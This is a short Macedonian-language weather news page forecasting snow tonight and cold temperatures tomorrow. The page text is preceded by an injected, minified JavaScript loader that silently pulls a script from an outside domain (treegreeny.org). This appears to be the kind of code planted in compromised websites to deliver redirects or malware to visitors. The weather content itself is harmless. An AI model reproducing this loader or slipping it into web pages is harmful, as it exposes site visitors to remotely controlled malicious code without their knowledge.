;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Вечерва снег ќе ја покрие Македонија -

Вечерва снег ќе ја покрие Македонија

Во вечерните часови ќе биде значително и тогаш врнежите ке бидат од снег кој на планините повремено ќе паѓа со умерен интезитет . Новата вкупна снежна покривка во западните делови од земјата од денес па се до изутрина ќе достигне до 10 см. ке дува и умерен до засилен северен ветар.

УТРЕ : Променливо облачно и студено во северните и западните делови од земјата со услови да провејува слаб снег . Минимални температури од -9 до -2 а максималните од -2 до 3 степени .

Leave a Reply

Your email address will not be published.